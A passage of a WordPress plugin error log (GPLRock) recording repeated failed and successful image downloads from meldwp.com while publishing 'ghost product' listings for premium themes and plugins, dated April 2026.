the-workout-trainer-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:55 UTC] GPLRock: Image download failed for product the-workout-trainer-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-workout---trainer-fitness-wordpress-theme-24941.webp for product the-workout-trainer-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:16:57 UTC] GPLRock: Image download failed for product the-workout-trainer-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:16:59 UTC] GPLRock: Image download failed for product the-workout-trainer-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:17:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-workout---trainer-fitness-wordpress-theme-24941.webp for product the-workout-trainer-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:17:01 UTC] GPLRock WARNING: Image download failed for product the-workout-trainer-fitness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/the-workout---trainer-fitness-wordpress-theme-24941.webp [07-Apr-2026 05:17:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-workout-trainer-fitness-wordpress-theme [07-Apr-2026 05:17:03 UTC] GPLRock: Image download failed for product kitecx-architecture-interior-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:17:06 UTC] GPLRock: Image download failed for product kitecx-architecture-interior-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:17:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kitecx---architecture--interior-wordpress-theme-8440.webp for product kitecx-architecture-interior-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:17:08 UTC] GPLRock: Image download failed for product kitecx-architecture-interior-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:17:10 UTC] GPLRock: Image download failed for product kitecx-architecture-interior-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:17:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kitecx---architecture--interior-wordpress-theme-8440.webp for product kitecx-architecture-interior-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:17:12 UTC] GPLRock WARNING: Image download failed for product kitecx-architecture-interior-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kitecx---architecture--interior-wordpress-theme-8440.webp [07-Apr-2026 05:17:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kitecx-architecture-interior-wordpress-theme [07-Apr-2026 05:18:04 UTC] GPLRock: Image download failed for product voevod-woocommerce-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:06 UTC] GPLRock: Image download failed for product voevod-woocommerce-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voevod---woocommerce-store-wordpress-theme-33241.webp for product voevod-woocommerce-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:08 UTC] GPLRock: Image download failed for product voevod-woocommerce-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:11 UTC] GPLRock: Image download failed for product voevod-woocommerce-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voevod---woocommerce-store-wordpress-theme-33241.webp for product voevod-woocommerce-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:13 UTC] GPLRock WARNING: Image download failed for product voevod-woocommerce-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/voevod---woocommerce-store-wordpress-theme-33241.webp [07-Apr-2026 05:18:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: voevod-woocommerce-store-wordpress-theme [07-Apr-2026 05:18:13 UTC] GPLRock: Image download failed for product objektiv-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:15 UTC] GPLRock: Image download failed for product objektiv-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/objektiv---photography-wordpress-theme-18206.webp for product objektiv-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:17 UTC] GPLRock: Image download failed for product objektiv-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:19 UTC] GPLRock: Image download failed for product objektiv-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/objektiv---photography-wordpress-theme-18206.webp for product objektiv-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:21 UTC] GPLRock WARNING: Image download failed for product objektiv-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/objektiv---photography-wordpress-theme-18206.webp [07-Apr-2026 05:18:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: objektiv-photography-wordpress-theme [07-Apr-2026 05:18:21 UTC] GPLRock: Image downloaded successfully for product urbania-modern-minimal-wordpress-blog (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-384b6c90.webp [07-Apr-2026 05:18:21 UTC] GPLRock: Using pre-downloaded image for product urbania-modern-minimal-wordpress-blog: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-384b6c90.webp [07-Apr-2026 05:18:21 UTC] GPLRock: Ghost product published with image - Product ID: urbania-modern-minimal-wordpress-blog [07-Apr-2026 05:18:22 UTC] GPLRock: Image download failed for product vromon-tour-travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:24 UTC] GPLRock: Image download failed for product vromon-tour-travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vromon---tour--travel-agency-wordpress-theme-31015.webp for product vromon-tour-travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:26 UTC] GPLRock: Image download failed for product vromon-tour-travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:28 UTC] GPLRock: Image download failed for product vromon-tour-travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vromon---tour--travel-agency-wordpress-theme-31015.webp for product vromon-tour-travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:30 UTC] GPLRock WARNING: Image download failed for product vromon-tour-travel-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vromon---tour--travel-agency-wordpress-theme-31015.webp [07-Apr-2026 05:18:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vromon-tour-travel-agency-wordpress-theme [07-Apr-2026 05:18:30 UTC] GPLRock: Image downloaded successfully for product coachi-coaching-online-courses-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-203b9813.webp [07-Apr-2026 05:18:30 UTC] GPLRock: Using pre-downloaded image for product coachi-coaching-online-courses-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-203b9813.webp [07-Apr-2026 05:18:30 UTC] GPLRock: Ghost product published with image - Product ID: coachi-coaching-online-courses-wordpress-theme [07-Apr-2026 05:18:30 UTC] GPLRock: Image download failed for product marion-cannabis-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:33 UTC] GPLRock: Image download failed for product marion-cannabis-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marion---cannabis-wordpress-theme-2164.webp for product marion-cannabis-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:35 UTC] GPLRock: Image download failed for product marion-cannabis-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:37 UTC] GPLRock: Image download failed for product marion-cannabis-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marion---cannabis-wordpress-theme-2164.webp for product marion-cannabis-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:39 UTC] GPLRock WARNING: Image download failed for product marion-cannabis-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/marion---cannabis-wordpress-theme-2164.webp [07-Apr-2026 05:18:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marion-cannabis-wordpress-theme [07-Apr-2026 05:18:39 UTC] GPLRock: Image download failed for product sanito-sanitizing-and-cleaning-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:41 UTC] GPLRock: Image download failed for product sanito-sanitizing-and-cleaning-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sanito---sanitizing-and-cleaning-wordpress-theme-5662.webp for product sanito-sanitizing-and-cleaning-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:44 UTC] GPLRock: Image download failed for product sanito-sanitizing-and-cleaning-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:46 UTC] GPLRock: Image download failed for product sanito-sanitizing-and-cleaning-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sanito---sanitizing-and-cleaning-wordpress-theme-5662.webp for product sanito-sanitizing-and-cleaning-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:48 UTC] GPLRock WARNING: Image download failed for product sanito-sanitizing-and-cleaning-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sanito---sanitizing-and-cleaning-wordpress-theme-5662.webp [07-Apr-2026 05:18:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sanito-sanitizing-and-cleaning-wordpress-theme [07-Apr-2026 05:18:48 UTC] GPLRock: Image download failed for product riorelax-luxury-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:50 UTC] GPLRock: Image download failed for product riorelax-luxury-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/riorelax--luxury-hotel-wordpress-theme-2614.webp for product riorelax-luxury-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:52 UTC] GPLRock: Image download failed for product riorelax-luxury-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:54 UTC] GPLRock: Image download failed for product riorelax-luxury-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/riorelax--luxury-hotel-wordpress-theme-2614.webp for product riorelax-luxury-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:18:56 UTC] GPLRock WARNING: Image download failed for product riorelax-luxury-hotel-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/riorelax--luxury-hotel-wordpress-theme-2614.webp [07-Apr-2026 05:18:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: riorelax-luxury-hotel-wordpress-theme [07-Apr-2026 05:18:57 UTC] GPLRock: Image download failed for product rt-theme-20-health-and-medical-product-catalog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:18:59 UTC] GPLRock: Image download failed for product rt-theme-20-health-and-medical-product-catalog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:19:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rt-theme-20--health-and-medical-product-catalog-wordpress-theme-11943.webp for product rt-theme-20-health-and-medical-product-catalog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:19:01 UTC] GPLRock: Image download failed for product rt-theme-20-health-and-medical-product-catalog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:19:03 UTC] GPLRock: Image download failed for product rt-theme-20-health-and-medical-product-catalog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:19:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rt-theme-20--health-and-medical-product-catalog-wordpress-theme-11943.webp for product rt-theme-20-health-and-medical-product-catalog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:19:05 UTC] GPLRock WARNING: Image download failed for product rt-theme-20-health-and-medical-product-catalog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rt-theme-20--health-and-medical-product-catalog-wordpress-theme-11943.webp [07-Apr-2026 05:19:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rt-theme-20-health-and-medical-product-catalog-wordpress-theme [07-Apr-2026 05:19:05 UTC] GPLRock: Image download failed for product travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:19:07 UTC] GPLRock: Image download failed for product travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:19:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travel-agency-wordpress-theme-7436.webp for product travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:19:10 UTC] GPLRock: Image download failed for product travel-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:19:12 UTC] GPLRock: Image download failed for product travel-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 05:19:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travel-agency-wordpress-theme-7436.webp for product travel-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 05:19:14 UTC] GPLRock WARNING: Image download failed for product travel-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/travel-agency-wordpress-theme-7436.webp [07-Apr-2026 05:19:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travel-agency-wordpress-theme [07-Apr-2026 05:19:34 UTC] GPLRock: Image downloaded successfully for product ait-advanced-search (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78e29aa0.jpg [07-Apr-2026 05:19:34 UTC] GPLRock: Using pre-downloaded image for product ait-advanced-search: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78e29aa0.jpg [07-Apr-2026 05:19:34 UTC] GPLRock: Ghost product published with image - Product ID: ait-advanced-search [07-Apr-2026 05:19:36 UTC] GPLRock: Image downloaded successfully for product ait-advanced-filters (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e2bb1437.jpg [07-Apr-2026 05:19:36 UTC] GPLRock: Using pre-downloaded image for product ait-advanced-filters: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e2bb1437.jpg [07-Apr-2026 05:19:36 UTC] GPLRock: Ghost product published with image - Product ID: ait-advanced-filters [07-Apr-2026 05:19:37 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-mailchimp-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af5cc78b.jpg [07-Apr-2026 05:19:37 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-mailchimp-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af5cc78b.jpg [07-Apr-2026 05:19:37 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-mailchimp-pro [07-Apr-2026 05:19:38 UTC] GPLRock: Image downloaded successfully for product dhvc-form (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0cdb570.jpg [07-Apr-2026 05:19:38 UTC] GPLRock: Using pre-downloaded image for product dhvc-form: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0cdb570.jpg [07-Apr-2026 05:19:38 UTC] GPLRock: Ghost product published with image - Product ID: dhvc-form [07-Apr-2026 05:19:40 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-stripe-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ac3eefd.jpg [07-Apr-2026 05:19:40 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-stripe-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ac3eefd.jpg [07-Apr-2026 05:19:40 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-stripe-premium [07-Apr-2026 05:19:41 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-email-templates-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3616015a.jpg [07-Apr-2026 05:19:41 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-email-templates-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3616015a.jpg [07-Apr-2026 05:19:41 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-email-templates-premium [07-Apr-2026 05:19:43 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-quick-export-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5cab8a7.jpg [07-Apr-2026 05:19:43 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-quick-export-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5cab8a7.jpg [07-Apr-2026 05:19:43 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-quick-export-premium [07-Apr-2026 05:19:45 UTC] GPLRock: Image downloaded successfully for product woocommerce-pdf-vouchers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a697fa33.jpg [07-Apr-2026 05:19:45 UTC] GPLRock: Using pre-downloaded image for product woocommerce-pdf-vouchers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a697fa33.jpg [07-Apr-2026 05:19:45 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-pdf-vouchers [07-Apr-2026 05:19:46 UTC] GPLRock: Image downloaded successfully for product woocommerce-eu-vat-number (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e25181c.jpg [07-Apr-2026 05:19:46 UTC] GPLRock: Using pre-downloaded image for product woocommerce-eu-vat-number: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e25181c.jpg [07-Apr-2026 05:19:46 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-eu-vat-number [07-Apr-2026 05:19:48 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-cart-messages-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-504020e8.jpg [07-Apr-2026 05:19:48 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-cart-messages-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-504020e8.jpg [07-Apr-2026 05:19:48 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-cart-messages-premium [07-Apr-2026 09:04:15 UTC] GPLRock: Image downloaded successfully for product yith-stripe-connect-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1dde0def.jpg [07-Apr-2026 09:04:15 UTC] GPLRock: Using pre-downloaded image for product yith-stripe-connect-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1dde0def.jpg [07-Apr-2026 09:04:15 UTC] GPLRock: Ghost product published with image - Product ID: yith-stripe-connect-for-woocommerce-premium [07-Apr-2026 09:04:17 UTC] GPLRock: Image downloaded successfully for product studiopress-studio-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c98fe0f.jpg [07-Apr-2026 09:04:17 UTC] GPLRock: Using pre-downloaded image for product studiopress-studio-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5c98fe0f.jpg [07-Apr-2026 09:04:17 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-studio-pro-genesis-wordpress-theme [07-Apr-2026 09:04:18 UTC] GPLRock: Image downloaded successfully for product progress-map-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c123560a.avif [07-Apr-2026 09:04:18 UTC] GPLRock: Using pre-downloaded image for product progress-map-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c123560a.avif [07-Apr-2026 09:04:18 UTC] GPLRock: Ghost product published with image - Product ID: progress-map-wordpress-plugin [07-Apr-2026 09:04:20 UTC] GPLRock: Image downloaded successfully for product social-locker-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8fc14d74.jpg [07-Apr-2026 09:04:20 UTC] GPLRock: Using pre-downloaded image for product social-locker-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8fc14d74.jpg [07-Apr-2026 09:04:20 UTC] GPLRock: Ghost product published with image - Product ID: social-locker-for-wordpress [07-Apr-2026 09:04:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-bulk-download (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89c46438.jpg [07-Apr-2026 09:04:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-bulk-download: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-89c46438.jpg [07-Apr-2026 09:04:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-bulk-download [07-Apr-2026 09:04:23 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-live-stream-widget (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-03c9710c.jpg [07-Apr-2026 09:04:23 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-live-stream-widget: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-03c9710c.jpg [07-Apr-2026 09:04:23 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-live-stream-widget [07-Apr-2026 09:04:25 UTC] GPLRock: Image downloaded successfully for product file-manager-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f26bbb11.jpg [07-Apr-2026 09:04:26 UTC] GPLRock: Using pre-downloaded image for product file-manager-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f26bbb11.jpg [07-Apr-2026 09:04:26 UTC] GPLRock: Ghost product published with image - Product ID: file-manager-plugin-for-wordpress [07-Apr-2026 09:04:27 UTC] GPLRock: Image downloaded successfully for product give-braintree-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fd33c532.jpg [07-Apr-2026 09:04:27 UTC] GPLRock: Using pre-downloaded image for product give-braintree-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fd33c532.jpg [07-Apr-2026 09:04:27 UTC] GPLRock: Ghost product published with image - Product ID: give-braintree-gateway [07-Apr-2026 09:04:29 UTC] GPLRock: Image downloaded successfully for product searchwp-redirects (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b568bb97.jpg [07-Apr-2026 09:04:29 UTC] GPLRock: Using pre-downloaded image for product searchwp-redirects: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b568bb97.jpg [07-Apr-2026 09:04:29 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-redirects [07-Apr-2026 09:04:31 UTC] GPLRock: Image downloaded successfully for product mythemeshop-feminine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-847ea6d8.jpg [07-Apr-2026 09:04:32 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-feminine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-847ea6d8.jpg [07-Apr-2026 09:04:32 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-feminine-wordpress-theme [07-Apr-2026 10:10:00 UTC] GPLRock: Image download failed for product the-spice-lounge-restaurant-cafe-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:02 UTC] GPLRock: Image download failed for product the-spice-lounge-restaurant-cafe-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-spice-lounge---restaurant--cafe-html5-template-1102.webp for product the-spice-lounge-restaurant-cafe-html5-template after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:05 UTC] GPLRock: Image download failed for product the-spice-lounge-restaurant-cafe-html5-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:07 UTC] GPLRock: Image download failed for product the-spice-lounge-restaurant-cafe-html5-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-spice-lounge---restaurant--cafe-html5-template-1102.webp for product the-spice-lounge-restaurant-cafe-html5-template after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:09 UTC] GPLRock WARNING: Image download failed for product the-spice-lounge-restaurant-cafe-html5-template. URL: https://meldwp.com/wp-content/uploads/the-spice-lounge---restaurant--cafe-html5-template-1102.webp [07-Apr-2026 10:10:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-spice-lounge-restaurant-cafe-html5-template [07-Apr-2026 10:10:09 UTC] GPLRock: Image download failed for product artemiz-blog-podcast-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:11 UTC] GPLRock: Image download failed for product artemiz-blog-podcast-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artemiz--blog--podcast-wordpress-theme-17464.webp for product artemiz-blog-podcast-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:13 UTC] GPLRock: Image download failed for product artemiz-blog-podcast-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:15 UTC] GPLRock: Image download failed for product artemiz-blog-podcast-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artemiz--blog--podcast-wordpress-theme-17464.webp for product artemiz-blog-podcast-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:10:17 UTC] GPLRock WARNING: Image download failed for product artemiz-blog-podcast-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artemiz--blog--podcast-wordpress-theme-17464.webp [07-Apr-2026 10:10:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artemiz-blog-podcast-wordpress-theme [07-Apr-2026 10:10:18 UTC] GPLRock: Image download failed for product optico-optometrist-eye-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:10:20 UTC] GPLRock: Image download failed for product optico-optometrist-eye-care-wordpress-theme (attempt 2/3). HTTP 